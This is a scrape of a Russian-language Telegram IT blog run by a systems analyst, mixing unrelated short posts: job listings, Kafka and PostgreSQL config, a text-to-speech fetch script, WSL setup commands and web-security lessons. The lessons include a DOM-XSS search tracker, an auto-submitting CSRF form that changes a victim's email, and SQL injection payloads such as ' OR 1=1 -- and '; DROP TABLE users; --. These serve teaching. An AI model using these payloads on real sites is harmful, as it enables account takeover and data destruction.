Авторский ИТ-блог на разные темы. Тут много чего.
@artem_leshchev — аффтор, ведущий системный аналитик на проекте банка ВТБ.
Post #146
31
This post (sticker, poll or similar) has no web preview. Open in Telegram
АР @asleshchev
This post (sticker, poll or similar) has no web preview. Open in Telegram
<script>
function trackSearch(query) {
document.write('<img src="/resources/images/tracker.gif?searchTerms='+query+'">');
}
var query = (new URLSearchParams(window.location.search)).get('search');
if(query) {
trackSearch(query);
}
</script>
<img src="/resources/images/tracker.gif?searchTerms=rocknroll">
Content-Security-Policy: default-src 'self'
Content-Security-Policy: default-src 'self'*.trusted.com
YADRO — российская технологическая компания, созданная в 2014 году и объединяющая направления разработки и производства вычислительных платформ, систем обработки и хранения данных, телекоммуникационного и сетевого оборудования, персональных и «умных» устройств, микропроцессорных ядер и fabless-разработку микропроцессоров.Сразу оговорюсь, что YADRO нанимают и software-аналитиков тоже.
— Разработка спецификации требований для составных частей multi-RAT базовой станции, а также сервисов, необходимых для запуска, обновления и обмена сообщениями других SW компонентов базовой станции;
Что мы ожидаем от будущего члена команды:❓ Какими знаниями из перечисленного может обладать обычный СА?
— Уверенное понимание технологий и архитектуры программных продуктов;
— Знания сетевых протоколов, включая IP, DNS, DHCP, VRRP
— Знания/опыта работы с решениями в области синхронизации, PTP, Glonass, GPS, SyncE, NTP
— Опыта работы с различными сборками Linux (Debian, Red Hat, ...)
— Знания процесса загрузки Linux, PXE, BIOS/UEFI, systemd
— Знания процессоров семейства Intel/AMD, x86, ARM
— Знания в области схемотехники
— Знания физических интерфейсов (PCIe, Ethernet, I2C,...)
— Знания протоколов/интерфейсов, в том числе для взаимодействия с BMC (ipmi, Redfish, ...)
— Опыт написания технической документации.
— Владение английским языком на уровне чтения и написания технической документации.
Дополнительно приветствуем:
— Знание технологий контейнеризации и оркестрирования
— Опыт администрирования, в т.ч. инсталляция, конфигурирование и обслуживание
— Работа с драйверами, оптимизация производительности
— Проектирования компьютеров/систем на базе x86, ARM, RISC
— Практический опыт схемотехнического проектирования
— Опыт программирования на Go (Golang), bash, Python и/или C/C++;
— Опыт программирования/отладки микроконтроллеров, плис
— Опыт работы, знания мобильных телекоммуникационных систем GSM/LTE/5G или знания/опыт работы в смежных областях (Tetra,...)
— Обеспечение экспертной декомпозиции требований для BIOS / BMC / Firmware команды разработки, включая формирование и обновление технических требований к продукту, декомпозируя требования от владельца продукта и/или системного архитектора, L3 поддержки, с учётом имеющегося и запланированного функционала, для нескольких параллельных потоков.
Мы ожидаем от будущего члена команды:
— Знание hw архитектуры и общих принципов создания серверов в железе.
— Базовые знания основ Linux.
— Базовые знания сетевых технологий (LAN, SAN-сети, ICMP/ SNMP / IPMI / Redfish).
— Навыки анализа и сбора сложных бизнес-требований и требований к оборудованию.
— Опыт создания детальных технических заданий в области инфраструктуры.
— Умение ясно доносить сложную техническую информацию
Приветствуется:
— Базовое понимание архитектуры BIOS/UEFI и BMC.
Вредоносная CSRF-форма не крадет ваши данные, например, логин и пароль!
Она заставляет ваш браузер отправить запрос на другой сайт без вашего ведома.
Для кражи данных потребуется связка CSRF + XSS (Кросс-сайтовый скриптинг).
<html>
<body>
<form action="https://vulnerable-website.com/email/change" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
This post (sticker, poll or similar) has no web preview. Open in Telegram
Ukfj/9//0P...
Кракозябры. Не сойдется кодировка, но это не важно.
Много нулей:
0, 0, 0...
Нам важно только чтобы кол-во элементов массива равнялось их кол-ву в бинарной строке!
Тип данных уже не string, а object!
Нули заменены на char-коды символов: 82, 73, 70, 70...
const getAudio = async() => {
try {
sessionIdFromLs = localStorage.getItem("session_id");
const response1 = await fetch("ЗАПРОС НА TTS-СИНТЕЗ", {
"headers": {
"X-Session-ID": `${sessionIdFromLs}`,
"Content-Type": "application/json"
},\
"body": "{ТЕКСТ ДЛЯ ОЗВУЧКИ}",
"method": "POST"
});
if (response1.ok) {
const data_blob = await response1.json();
const blob_value = data_blob.data;
const binary = atob(blob_value);
const bytes = new Uint8Array(binary.length);
for (let i = 0; i <binary.length; i++) bytes[i] = binary.charCodeAt(i);
const blob = new Blob([bytes], {type: 'audio/wav'});
const url = URL.createObjectURL(blob);
const audio = new Audio(url);
audio.play()
} else {
const response2 = await fetch("ЗАПРОС СОЗДАНИЯ СЕССИИ", {
"headers": {
"content-type": "application/json"
},
"body": "{ЛОГИН И ПАРОЛЬ}",
"method": "POST"
});
const data = await response2.json();
sessionIdFromLs = data.session_id;
localStorage.setItem("session_id", sessionIdFromLs);
const response3 = await fetch("ЗАПРОС НА TTS-СИНТЕЗ", {
"headers": {
"X-Session-ID": `${sessionIdFromLs}`,
"Content-Type": "application/json"
},
"body": "{ТЕКСТ ДЛЯ ОЗВУЧКИ}",
"method": "POST"
});
const data_blob = await response3.json();
const blob_value = data_blob.data;
const binary = atob(blob_value);
const bytes = new Uint8Array(binary.length);
for (let i = 0; i <binary.length; i++) bytes[i] = binary.charCodeAt(i);
const blob = new Blob([bytes], {type: 'audio/wav'});
const url = URL.createObjectURL(blob);
const audio = new Audio(url);
audio.play()
};
} catch(error) {
console.error('Ошибка: ', error);
};
};
getAudio()Математическое представление смысла того или иного объекта: текст, картинка, аудио, документа. Поиск идет по смыслу, а не по ключевым словам.
Security Operations Center — центр мониторинга информационной безопасности. Аналитики SOC круглосуточно мониторят ИТ-инфраструктуру. Отслеживают подозрительную активность, анализируют и реагируют на инциденты.
Adversarial Tactics, Techniques, and Common Knowledge / Техники, тактики и общее знание атак — общедоступная база знаний о методах киберпреступников. Разработана некоммерческой организацией MITRE Corporation в 2013 году.

services:
zookeeper:
image: confluentinc/cp-zookeeper:7.3.2
hostname: zookeeper
container_name: zookeeper
ports:
- "2181:2181"
environment:
ZOOKEEPER_CLIENT_PORT: 2181
ZOOKEEPER_SERVER_ID: 1
ZOOKEEPER_SERVERS: zookeeper:2888:3888
kafka:
image: confluentinc/cp-kafka:7.3.2
hostname: kafka
container_name: kafka
ports:
- "9092:9092"
environment:
KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://127.0.0.1:9092
KAFKA_LISTENERS: PLAINTEXT://0.0.0.0:9092
KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT
KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
KAFKA_ZOOKEEPER_CONNECT: "zookeeper:2181"
KAFKA_BROKER_ID: 1
KAFKA_LOG4J_LOGGERS: "kafka.controller=INFO,kafka.producer.async.DefaultEventHandler=INFO,state.change.logger=INFO"
KAFKA_AUTHORIZER_CLASS_NAME: kafka.security.authorizer.AclAuthorizer
KAFKA_ALLOW_EVERYONE_IF_NO_ACL_FOUND: "true"
KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 3
depends_on:
- zookeeper
CREATE TABLE customers (id INTEGER, status TEXT, arr NUMERIC) PARTITION BY LIST(status);
---Создание секции:
CREATE TABLE cust_active PARTITION OF customers FOR VALUES IN ('ACTIVE');
CREATE TABLE customers (id INTEGER, status TEXT, arr NUMERIC) PARTITION BY HASH(id);
---Создание секции:
CREATE TABLE cust_part1 PARTITION OF customers FOR VALUES WITH (modulus 3, remainder 0);

Forwarded from Positive Technologies

черновик: — а точнее, с трех эмодзи, которые ее и составляли. После нее каналы, в том числе крупных и известных брендов, соревновались в юморе: кто интереснее подаст свой черновик. Мы — в том числе. 
cur.execute('INSERT INTO users(id, name, surname) VALUES(?, ?, ?)', (id, name, surname))
cur.execute('SELECT * FROM users WHERE login = ? AND password = ?', (login, password))cur.execute(f'INSERT INTO cars(car_id, model) VALUES({car_id}, {model})')SELECT * FROM users WHERE login = '{логин_пользователя}' AND password = '{пароль}';' OR 1=1; --
SELECT * FROM users WHERE login = '' OR 1=1; -- AND password = 'qwerty';
# Never do this -- insecure!
symbol = input()
# ' OR TRUE; --
sql = "SELECT * FROM stocks WHERE symbol = '%s'" % symbol
print(sql)
# SELECT * FROM stocks WHERE symbol = '' OR TRUE; --'
cur.execute(sql)
'; DROP TABLE users; --
SELECT * FROM users WHERE login= ''; DROP TABLE users; --' AND password = '';
' order by 10 --
' group by 10 --
' OR IF(1=1, SLEEP(5), 0) --
login = CHAR(103, 111, 100)
login = 0x676F64
wsl --installwsl --list --onlinewsl --install -d <DistroName>wsl --install --web-downloadcd /mnt/<буква_диска>/<Путь_к_файлам>cd /mnt/d/OneClickMonitoring-mainchmod +x setup-monitoring.sh./setup-monitoring.sh